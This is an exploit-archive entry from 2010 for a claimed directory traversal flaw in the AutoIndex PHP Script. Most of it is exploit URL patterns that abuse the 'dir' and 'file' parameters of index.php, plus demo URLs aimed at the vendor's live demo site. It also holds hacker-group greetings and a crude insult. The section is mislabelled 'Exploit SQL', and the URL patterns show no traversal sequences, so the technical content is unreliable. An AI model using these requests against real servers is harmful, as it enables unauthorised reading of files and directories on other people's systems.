AutoIndex PHP Script - 'index.php' Directory Traversal

EDB-ID:

11051

CVE:

N/A




Platform:

PHP

Date:

2010-01-07


==============================================================================
    [?] AutoIndex PHP Script (index.php) Directory Traversal Vulnerability 
==============================================================================
    [?] My home:              [ http://sec-r1z.com ]
    [?] Script:               [ AutoIndex PHP Script ]
    [?] Language:             [ PHP ]
    [?] Vendor                [http://autoindex.sourceforge.net/]
    [?] Founder:              [ ./Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
    [?] Fuck To :             [ Zombie_KsA << big big big L4m3r ] 
########################################################################
  
===[ Exploit SQL ]===
  
[»]exploit : [Path]/index.php?dir=[S0me f0LdEr]

[»]exploit : [Path]/index.php?dir=&file=[S0me File]
 
[»]dem0:

http://autoindex.sourceforge.net/demo/index.php?dir=&file=note.txt       << This file

http://autoindex.sourceforge.net/demo/index.php?dir=icon%20tests/test%20dir/   << This FoldEr



==============================================================================